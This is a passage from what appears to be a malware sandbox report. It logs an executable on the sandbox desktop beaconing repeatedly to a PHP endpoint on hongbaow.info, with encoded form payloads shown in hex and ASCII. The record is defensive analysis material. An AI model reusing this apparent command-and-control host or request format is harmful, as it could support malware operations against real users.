                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:35:08 UTC808INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:08 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zhHh0TJWue2rs19pYYnDtKsMbValaP4c69BC2x56eS0pdYz63tWrJB3zTaba1uI%2FFk3DDONEwSQANh6iY50KXLlHD2u4c7IczZinrS52P7nQm8U2kNkr1PaMX%2Fl%2FfQIH"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddd95e946c358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1450&rtt_var=557&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1941489&cwnd=155&unsent_bytes=0&cid=ca3266c0c5be679c&ts=336&x=0"
                            2025-01-22 07:35:08 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.449738104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:10 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:10 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:11 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:11 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zSdUhzjQZsM%2B2YCcLqLvLOfD%2B8ponGMm5hQ1fP4eBa6qaxz9y9NCoJ%2BTyhuuENtEy0Ii5R3pcUqzatCNFUnDYYBIrZ76Fjgya9%2FUGaH20ffdMEOxvqBdgutlnnCsUOCg"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddda60b24de95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1448&min_rtt=1443&rtt_var=551&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1968981&cwnd=246&unsent_bytes=0&cid=5890a138acc87c6a&ts=324&x=0"
                            2025-01-22 07:35:11 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.449739104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:14 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:35:14 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:35:14 UTC806INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:14 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aGNvv5jEsCA5qOXyvZpcTrAPk6L3whCMB8WlEOcKvymWULFzLeoO2mNV9UZB5bD5WmXMfxgVXG1NDIA0FDlXkRxhqBNLSpsNhiJp0R%2B2QEnXOqVMQlz7etylnfsYD%2FCn"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dddba59fd7c6a-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1779&rtt_var=678&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1170&delivery_rate=1602634&cwnd=218&unsent_bytes=0&cid=260e5118d15d2d68&ts=351&x=0"
                            2025-01-22 07:35:14 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.449740104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:14 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:14 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:15 UTC811INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:15 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5CkU37ZJIATQxp3CK8vW9wThc%2F%2FMWZgz3wSLsVLGLbTPPKSuZ0RIW7OaIOQdexWKEHVRFmDu13zinr%2B%2BN0cXPS9uvxX%2FlqvLqKzSTIzoNS2tkRt4gUhihOGkM2PVRm9T"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dddbdfa098ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1782&rtt_var=676&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1610590&cwnd=237&unsent_bytes=0&cid=501801c1c49a5492&ts=351&x=0"
                            2025-01-22 07:35:15 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.449745104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:18 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:18 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:18 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:18 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MFmChnfkXwacX83%2Fy37iIN46dOemxpsmCxMqTm2DHcPmejrR6QBDtbkxN2o3U0E6aM8Y78PDaQ6EV3rhKdjxctr%2BL%2BpVhQuvaYEUGXN0r2xD0%2BsQXkJU1SA6ZR7YOdGu"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dddd5eb9042eb-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1555&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1768625&cwnd=215&unsent_bytes=0&cid=c4badf7508338783&ts=341&x=0"
                            2025-01-22 07:35:18 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.449748104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:20 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:35:20 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:35:20 UTC812INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:20 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8P3%2BRcUJoNxK%2B5D9xe%2FHKEc%2Fdtc67GPddWZsEYpubziWpvHVYqa5wyOv06Rcu5BHdzJnnEeoZs%2Bj2yKIHa2mQFNuACZkr9p21PhfuHihLpLJ0dSmXPaaIw2x254An2qz"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905ddddee9a14414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1589&rtt_var=597&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1837633&cwnd=180&unsent_bytes=0&cid=31bdbe08316c9577&ts=352&x=0"
                            2025-01-22 07:35:20 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.449749104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:22 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:22 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:22 UTC807INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:22 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WiPRCiTEiLAaIOXySchzekWQADNsqZkidyU6c4CtJCSa6zliOsTTxTkVqN%2FWI%2Bq0Z%2BvjMIHw8lbDtPL0eqOQIJH93jmSlkNPZnW6Nap5Xc3tl65vo5B4YLwotLYJra3v"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dddef182b4414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1595&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1798029&cwnd=180&unsent_bytes=0&cid=0a7d9f90790fbecc&ts=344&x=0"
                            2025-01-22 07:35:22 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.449750104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:25 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:35:25 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:35:26 UTC804INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:26 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=egem1iMHWpku8IaLBaoMV28Aq3uq7%2FLWnVwpJI8Xkd6SEqgXCGOqkFYw8q7YoK3BkNciwgS3MzAlSBjnqbdooyDyhRmGwcN522UU3MRANw7kMjdWBjyjnPEcDejJt1bo"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dde036dbb42eb-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1569&rtt_var=593&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1170&delivery_rate=1838790&cwnd=215&unsent_bytes=0&cid=9d989e98436894df&ts=353&x=0"
                            2025-01-22 07:35:26 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.449751104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:26 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:26 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:26 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:26 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mAp2v%2BqjOI49ESt9u4exFNBARoJe5DDG6qMbX3UlEfSOsZDFjr%2FR6T1mh0y%2FPKtq80U8Livu31DuPyRWq%2BJvZAB1dph9FDgeoQnZFP7pdeDYK6Fr9LUTdFMPlAl8GLGz"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dde06cd68de95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1471&min_rtt=1447&rtt_var=591&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1779402&cwnd=246&unsent_bytes=0&cid=68cb8150810524b0&ts=338&x=0"
                            2025-01-22 07:35:26 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.449752104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:30 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:35:30 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:35:30 UTC813INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:30 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nmmuxnKEzvf257vl1%2FHj9gSaEw7qmOYYzLf6gageAFiy%2F%2B7U9gOfsdieSsB%2Bict3SEGL4tOjXjwwTVaGye41bSkkYmhdb4TqRW3t5QWIKgL7mx4iOm5zxcWeCru%2Bl%2FFp"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dde1eee5c8ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1780&rtt_var=693&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1549893&cwnd=237&unsent_bytes=0&cid=908af790923bf5f7&ts=339&x=0"
                            2025-01-22 07:35:30 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.449753104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:35:31 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:35:31 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:35:32 UTC820INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:35:32 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bx%2F5AgQLXhf4og%2B%2FEAF6STVHHvOXOHGQ17EQlQzLa%2FD28ty84d240NGhkWQ5jYOn0fkD2rhUpwq2Y9KbDHc%2FIPTj4%2FfAE%2FdJG38TUun%2F5py5BtHQpZTdPI77Ublgbi8q"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905dde27dbd27c6a-EWR
                            alt-svc: h3=":443"; ma=86400
